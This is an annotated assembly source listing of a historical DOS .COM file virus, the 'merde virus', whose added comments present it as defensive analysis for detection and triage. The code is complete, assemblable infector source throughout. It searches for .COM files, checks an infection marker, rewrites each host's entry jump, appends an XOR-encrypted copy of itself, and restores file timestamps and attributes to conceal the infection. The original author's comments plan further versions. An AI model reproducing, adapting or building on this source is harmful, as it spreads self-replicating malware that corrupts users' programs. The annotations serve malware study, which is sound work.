; ---------------------------------------------------------------------
; Annotated listing (defensive analysis) of a historical DOS .COM
; infector ("merde virus", XOR-encoded generation).  MASM/Intel syntax,
; 16-bit real mode, DOS INT 21h services.  The code is left byte-
; identical; the annotations only describe what the visible
; instructions do, to support detection signatures and incident triage.
;
; Register roles as established by the code itself:
;   si = offset of `caller` (start of the on-disk virus image)
;   es = offset of `start` (used as a plain offset, not as a segment)
;   di = offset of `fspec`; the variable area is addressed as [di+N]
;   bp = offset control jumps to when finished (100h, restored host entry)
;   ax/bx/cx/dx = INT 21h arguments
; ---------------------------------------------------------------------
;well, here's the next installment of the merde virus...all that is new;
;is your run of the mill xor encryption........and a little change in;
;the code itself to make it slightly more modular...;
;up+coming: .exe version(why put 'em together? makes it too big);
;           an actual function besides infect!;
;           TSR infect version?;

; Offsets into the DOS Disk Transfer Area filled by FindFirst/FindNext.
attrib           equ 21                 ; DTA: attribute byte of the found file
time             equ 22                 ; DTA: file time (word)
date             equ 24                 ; DTA: file date (word)
fspec_address    equ 0e4h               ; distance from `start` to `fspec` (author's constant)
filesize         equ 26                 ; DTA: file size; only the low word is read below
fname            equ 30                 ; DTA: ASCIIZ name of the found file
dta              equ 80h                ; default DTA inside the PSP
virsize          equ 354                ; number of bytes appended to a host (author's constant)
byte_compare_val equ 35                 ; offset of the 2-byte "already infected" marker in the image

CODE_SEG SEGMENT BYTE
ASSUME DS:CODE_SEG, CS:CODE_SEG
ORG 100h

; .COM entry point.  In this image the 3 bytes at 100h are `jmp caller`;
; `start` later overwrites them with the bytes saved in first_3 before
; control is finally passed to 100h.
first:
        jmp     caller
        db      128 dup(00)             ; zero padding between the entry jump and the body

; Self-location: `call` pushes the address of encryptv, which is popped
; into si and adjusted back to `caller`.
caller:
        call    caller2                 ;si=this address for the whole thing;
;ok, for encryption, we use the value of the byte at the jump instruction;
;if the file we find isn't infected...;
encryptv:
        db      ?                       ; XOR key byte, read as [si+3]; written at label1
;si=offset of the "caller";
caller2:
        pop     si
        sub     si,3                    ; si = offset of `caller`
        jmp     getstart
;jmp to getstart and have it call us back, getting the address of "start";
;into es..(I know, why not just add the size of the stuff to si?;
;I'll do it some other time;

; Reached by `call after` from getstart: the pushed return address is
; the offset of `start`, which is popped into es.
after:
        pop     es                      ;es=start:;
;okay, I decided, arbitrarily, to use bp and jump from the encrypt;
;function so it was more unsingular to a particular circumstance;
        mov     bp,es                   ; `done` will `jmp bp` = start once decoded
;unencrypt de code+jump to virus;
        jmp     encrypt

;if we are being called from the write proc, we need to save BP on the stack;
; Entered by `call` from write_code.  Swaps bp (the final jump target)
; with the pushed return address, so `jmp bp` in `done` returns to
; write_code while the old bp value is left on the stack for it to pop.
encrypt_w:
        mov     ax,bp                   ;ax=whereto jump at end;
        pop     bp                      ;bp=return to write routine;
        push    ax                      ;where to jump at end is on stack

;note the standard, run o' the mill encrypt/decrypt!;
; In-place single-byte XOR of the bytes at offset es (= start), indices
; 0 through 0e8h (the compare follows the store), with the key at [si+3].
; The same routine decodes at run time and re-encodes before writing.
; Exits with `jmp bp`.
encrypt:
        push    bx                      ;might not be needed, I'll check later;
        push    si
        mov     cl,[si+3]               ;offset of encrypt value;
        mov     bx,es                   ;where to start encrypting;
        xor     si,si                   ; si = byte index
xloop:
        mov     al,[bx+si]
        xor     al,cl
        mov     [bx+si],al
        cmp     si,0e7h                 ;size of post-start(or close enough);
        ja      done
        inc     si
        jmp     xloop
done:
        pop     si
        pop     bx
        jmp     bp                      ;jump whereever we were supposed to;

; Appends the re-encoded image to the host: INT 21h AH=40h writes
; virsize bytes starting at [si] (= caller) to the handle saved at [di+9].
write_code:
        call    encrypt_w               ;yep, encrypt it;
        pop     bp                      ;get back address in this infected file;
        mov     bx,[di+9]               ;file to jump to, and file handle;
        mov     ah,40h                  ; DOS: write to handle
        mov     cx,virsize              ;total virus size
        mov     dx,si                   ; dx -> bytes at `caller`
        int     21h
        call    close_current
        jmp     nofiles                 ;not really, just didn't change name;

;this proc closes the file with original stats;
; Puts back the saved date/time (AX=5701h), closes the handle (AH=3Eh)
; and restores the saved attribute byte (AX=4301h).  Triage note: the
; host's timestamp and attributes are therefore unchanged after infection.
close_current:
        mov     dx,[di+14]              ; saved date
        mov     cx,[di+12]              ; saved time
        mov     ax,5701h                ; DOS: set file date/time
        mov     bx,[di+9]               ; handle
        int     21h
        mov     ah,3eh                  ; DOS: close handle
        int     21h
        mov     ax,4301h                ; DOS: set file attributes
        xor     ch,ch
        mov     cl,[di+11]              ; saved attribute byte
        int     21h
        ret

; Common exit: es is restored to ds and control goes to bp (100h, where
; `start` put back the host's original first 3 bytes).
nofiles:
        push    ds
        pop     es
        jmp     bp

getstart:
        call    after                   ; pushes the offset of `start` for `after` to pop
;encrypted from here on out-es=start of this procedure;

; Everything from here to the end is stored XOR-encoded on disk and is
; decoded in place by `encrypt` before execution reaches this label.
start:
        mov     di,es
        add     di,fspec_address        ;di=ADDRESS OF FILESPEC!;
        ; Restore the host's original 3 bytes (first_3) at 100h.
        mov     dh,[di+18]
        mov     ah,[di+17]
        mov     al,[di+16]
        mov     bx,100h
        mov     [bx],al
        mov     [bx+1],ah
        mov     [bx+2],dh
        mov     bp,bx                   ; bp = 100h: final jump target
        mov     ah,4eh                  ; DOS: FindFirst
;------------------;
        mov     cx,33                   ; attribute search mask (21h)
        mov     dx,di                   ; dx -> '*.com'
;find file match;
; Directory loop: AH is 4Eh on the first pass and 4Fh (FindNext) after.
search:
        int     21h
        jc      nofiles                 ;get out if none found;
        mov     bx,dta+filesize         ;compare filesize via BX;
        cmp     word ptr [bx],65000     ; low word of the DTA size only
        ja      leave1
        cmp     word ptr [bx],150
        jb      leave1
        jmp     ok
leave1:
        mov     ah,4fh                  ; DOS: FindNext
        jmp     search
; Candidate accepted: save attribute/time/date from the DTA, then set
; the file's attributes to 0.
ok:
        CLC                             ;Okay-- DI=base of fspec;
        mov     bx,dta+attrib
        mov     al,[bx]
        mov     [di+11],al              ;save attrib;
        mov     ax,word ptr [bx+1]
        mov     [di+12],ax              ;save time;
        mov     ax,word ptr [bx+3]
        mov     [di+14],ax              ;save date;
        mov     ax,4301h                ; DOS: set file attributes
        mov     cx,0
        mov     dx,dta+fname
        int     21h                     ;set attrib to 0;
label2:
        mov     ax,3d02h                ; DOS: open handle, read/write
        int     21h
        mov     [di+9],ax               ;open + save handle;
        mov     bx,ax
        mov     ah,3fh                  ; DOS: read from handle
        mov     cx,3
        mov     dx,di
        add     dx,16                   ;dx points to save area for first three bytes;
        int     21h                     ;open handle, and read 3 bytes into it;
        cmp     byte ptr [di+16],0e9h   ; does the host already begin with a near jmp?
        jne     label1
; Host begins with E9h: seek to (jmp displacement + 3 + byte_compare_val),
; read 2 bytes and compare them with the word at [si+byte_compare_val]
; in this image.  A match means "already infected" and the file is skipped.
cont:
        mov     ax,4200h                ; DOS: lseek from start of file
        xor     cx,cx
        mov     dx,[di+17]              ; 16-bit displacement of the host's jmp
        add     dx,3+byte_compare_val
        mov     bx,[di+9]
        int     21h
        mov     ah,3fh                  ; DOS: read 2 bytes into [di+6]
        mov     cx,2
        mov     dx,di
        add     dx,6
        int     21h
        mov     dx,[di+6]
        cmp     dx,[si+byte_compare_val]
        jne     label1
        call    close_current           ; marker found: restore stats, next file
        jmp     leave1
label1:
;set encrypt value here---(low order byte of filesize of next file;
        mov     bx,dta+filesize
        mov     dl,[bx]
        mov     [si+3],dl               ; key byte stored into encryptv
        mov     bx,[di+9]
        mov     ax,4200h                ; DOS: lseek to offset 0
        xor     cx,cx
        mov     dx,0
        int     21h
;okay, this is kinda thick..;
;set pointer to after jmp instruct, and change address to size;
;of file plus 3 for jmp instruction, minding that we have to flip stuff;
; Builds `E9 <size-3>` in the 3-byte buffer at [di+6] and writes it over
; the host's first 3 bytes, then seeks to end of file for write_code.
        mov     bx,dta+filesize
        mov     dh,[bx+1]               ;high val equals 2nd part of word+vice versa;
        mov     dl,[bx]
        sub     dx,3
        mov     [di+7],dx
        mov     byte ptr [di+6],0e9h
        mov     ah,40h                  ; DOS: write to handle
        mov     bx,[di+9]
        mov     dx,di
        add     dx,6
        mov     cx,3
        int     21h
        xor     cx,cx
        mov     ax,4202h                ; DOS: lseek to end of file
        xor     dx,dx
        int     21h
        jmp     write_code

; Variable area, addressed relative to di (= fspec).
fspec:          db      '*.com',0       ;bx+0;
disk_buffer:    db      3 DUP(?)        ;di+6;
handle:         dw      ?               ;di+9;
attribute:      db      ?               ;di+11;
otime:          dw      ?               ;di+12;
odate:          dw      ?               ;di+14;
first_3:        db      0cdh,20h,00     ;di+16;  `int 20h` in this image: host-less run just terminates
CODE_SEG ENDS
END first